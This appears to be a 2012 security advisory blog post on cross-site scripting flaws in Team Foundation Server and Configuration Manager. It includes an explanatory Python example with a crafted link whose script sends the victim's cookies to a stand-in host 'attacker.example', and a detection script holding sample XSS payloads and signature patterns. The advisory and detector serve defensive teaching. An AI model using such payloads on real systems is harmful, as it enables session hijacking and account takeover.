Secplicity - Security Simplified

Powered by WatchGuard Technologies

XSS Vulnerabilities in Microsoft Servers and Developer Tools

September 11, 2012 By Corey Nachreiner

Severity: Medium

Summary:

  • These vulnerabilities affect: Visual Studio Team Foundation Server 2010, Systems Management Server 2003, and System Center Configuration Manager 2007
  • How an attacker exploits it: By enticing a user to click a specially crafted link, or visit a malicious web site
  • Impact: An attacker can elevate his privileges and take any action your users can
  • What to do: Deploy the appropriate update as soon as possible, or let Windows Automatic Update do it for you

Exposure:

Today, Microsoft released two security bulletins describing a pair of cross-site scripting (XSS) vulnerabilities in their server software and development tools. They rate both updates as Important. The bulletins specifically affect:

  • Visual Studio Team Foundation Server 2010
  • Systems Management Server 2003
  • System Center Configuration Manager 2007

We summarize each bulletin below:

  • MS12-061: Visual Studio Team Foundation XSS Vulnerability

Team Foundation Server is a software development collaboration platform that allows developers to manage multi-person projects. Its web interface suffers from a cross-site scripting (XSS) vulnerability, which attackers can potentially leverage to elevate their privileges on your development server.

By enticing one of your users to click a specially crafted link, an attacker could exploit this flaw to execute script in that user's browser, in the context of your Team Foundation Server site and with the user's privileges. This script could steal the user's session cookies, redirect their browser to malicious sites, or essentially take any action the user could on your Team Foundation Server. If you use this development platform, you should apply Microsoft's update as soon as possible.

Microsoft rating: Important.
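To make the attack path in these bulletins concrete, here is an added example of a reflected XSS flaw and its fix. This is illustrative code written for this article, not code from MS12-061, MS12-062, or the affected Microsoft products, and the hostnames (tfs.example.local, attacker.example), the `q` parameter, and the handler names are assumptions. The server echoes a query parameter into its HTML; the vulnerable version concatenates it raw, the fixed version HTML-encodes it first, and the crafted link carries the script the bulletin warns about.

```python
"""Reflected XSS: vulnerable handler, hardened handler, and a crafted link.

Added example for illustration only. Not code from the Microsoft bulletins
or products discussed above; hostnames, parameter names and the payload are
assumptions chosen for the demonstration.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit


def render_search_vulnerable(query: str) -> str:
    # Vulnerable: the user-controlled 'query' value is placed into the HTML
    # unencoded, so any markup inside it is parsed and executed by the browser.
    return f"<html><body><h1>Results for: {query}</h1></body></html>"


def render_search_fixed(query: str) -> str:
    # Fixed: HTML-encode untrusted data before placing it in an HTML text
    # context. '<', '>', '&', '"' and "'" become entities and are rendered as
    # literal characters rather than interpreted as markup.
    safe = html.escape(query, quote=True)
    return f"<html><body><h1>Results for: {safe}</h1></body></html>"


def handle_request(url: str, renderer) -> str:
    # Extract the 'q' query parameter the way a server-side handler would
    # (parse_qs performs the URL-decoding), then render the page with it.
    parts = urlsplit(url)
    query = parse_qs(parts.query).get("q", [""])[0]
    return renderer(query)


# The specially crafted link of the kind the bulletins describe: the attacker's
# script rides in the query string and is reflected into the page by the server.
# Here it sends the victim's cookies to an attacker-controlled host (assumed name).
PAYLOAD = (
    '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
)
CRAFTED_LINK = "https://tfs.example.local/search?q=" + quote(PAYLOAD, safe="")


def attack_works(url: str, renderer) -> bool:
    # True if a live <script> tag survives into the response body, meaning the
    # browser would run the attacker's code with the victim's session.
    return "<script>" in handle_request(url, renderer)


if __name__ == "__main__":
    print("crafted link:", CRAFTED_LINK)
    print("vulnerable handler exploitable:", attack_works(CRAFTED_LINK, render_search_vulnerable))
    print("fixed handler exploitable:    ", attack_works(CRAFTED_LINK, render_search_fixed))
    print(handle_request(CRAFTED_LINK, render_search_fixed))
```

The fix is output encoding at the point where untrusted data meets HTML. Note that `html.escape` is correct only for an HTML text or attribute-value context; data placed inside a `<script>` block, a URL, or a CSS value needs the encoding appropriate to that context instead.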

  • MS12-062: System Center Configuration Manager XSS Vulnerability

System Center Configuration Manager is a PC management platform that allows you to manage many Windows computers at once. You can use it for patch management, software distribution, OS deployment, remote control, and more. It too suffers from a cross-site scripting (XSS) vulnerability, very similar to the one described above. Again, if an attacker can lure you into clicking a specially crafted link, he could exploit this flaw to execute script in your browser with your privileges. This would allow him to do anything in System Center Configuration Manager that you could, which on a management server that deploys software to every PC in your network is a significant amount. If you use this management system in your network, you should apply Microsoft's patch as soon as possible.

Microsoft rating: Important.

Solution Path:

Microsoft has released updates that correct these vulnerabilities. You should download, test, and deploy the appropriate patches as soon as you can. If you choose, you can also let Windows Update automatically download and install these updates for you, though we recommend you test server patches before deploying them to production environments.

The links below take you directly to the “Affected and Non-Affected Software” section for each bulletin, where you will find links for the various updates:

  • MS12-061
  • MS12-062

As an aside, Internet Explorer 8 and later include an XSS Filter that can block many reflected XSS attacks of this sort, where the script arrives in the crafted link and is echoed back by the server. Two caveats apply: the filter is enabled by default for the Internet zone but not for the Local intranet zone, which is where most Team Foundation and Configuration Manager servers live, so you may need to enable it for that zone through Internet Options or Group Policy; and researchers have found ways around it. Treat the XSS Filter as defense in depth, not as a substitute for the patches.

For All WatchGuard Users:

If you use a WatchGuard XTM appliance with the Intrusion Prevention Service (IPS), it can help mitigate attacks leveraging either of these flaws. According to our Best-in-Class IPS partner, one of our IPS service’s generic XSS signatures detects and prevents these vulnerabilities. We recommend you turn on our IPS service if you haven’t already.
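To show what a generic XSS signature of the kind mentioned above actually does, here is an added example of signature-style detection run over a handful of web request lines. This is illustrative code written for this article, not WatchGuard's IPS signature (whose contents are not published here) and not code from the affected products; the request lines are constructed for the example, and the paths and parameter names are assumptions.

```python
"""Generic XSS signature matching over HTTP request lines.

Added example for illustration only. Not WatchGuard's IPS signature and not
code from the products discussed above. The sample request lines below are
constructed for the example; the paths and parameter names are assumptions.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (method, target, version), as a web server
# log or a network sensor would see them. Two are benign, three carry payloads.
SAMPLE_REQUESTS = [
    "GET /tfs/web/search.aspx?q=release+notes HTTP/1.1",
    "GET /tfs/web/search.aspx?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1",
    "GET /ccm/report.aspx?name=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1",
    "GET /tfs/web/item.aspx?id=42&sort=asc HTTP/1.1",
    "GET /ccm/report.aspx?name=javascript%3Aalert(1) HTTP/1.1",
]

# Generic patterns, applied to the URL-decoded request target rather than the
# raw bytes, so that %3C-style encoding does not hide the markup.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),               # <script ...>
    re.compile(r"<\s*\w+[^>]*\son\w+\s*=", re.I),    # <tag ... onerror= / onload= ...
    re.compile(r"javascript\s*:", re.I),             # javascript: URLs
]


def decode_target(request_line: str) -> str:
    # Pull the request target out of "METHOD target VERSION" and URL-decode it
    # twice, so double-encoded payloads (%253C -> %3C -> <) are also normalized.
    target = request_line.split(" ", 2)[1]
    return unquote_plus(unquote_plus(target))


def is_suspicious(request_line: str) -> bool:
    # A request is flagged if any generic pattern matches its decoded target.
    decoded = decode_target(request_line)
    return any(pattern.search(decoded) for pattern in XSS_PATTERNS)


def flag_requests(lines):
    # Return the subset of request lines a generic XSS signature would alert on.
    return [line for line in lines if is_suspicious(line)]


if __name__ == "__main__":
    for line in flag_requests(SAMPLE_REQUESTS):
        print("ALERT:", line, "->", decode_target(line))
```

Generic signatures like these catch the obvious payloads, including the ones in the crafted links these bulletins describe, but they are pattern matches on decoded text and can be evaded by encodings or HTML tricks the signature author did not anticipate. That is why the IPS is a mitigation to buy you time, and the patch is the fix.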

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

  • MS Security Bulletin MS12-061
  • MS Security Bulletin MS12-062

Filed Under: Security Bytes Tagged With: Microsoft, Microsoft Servers, Updates and patches, Visual Studio
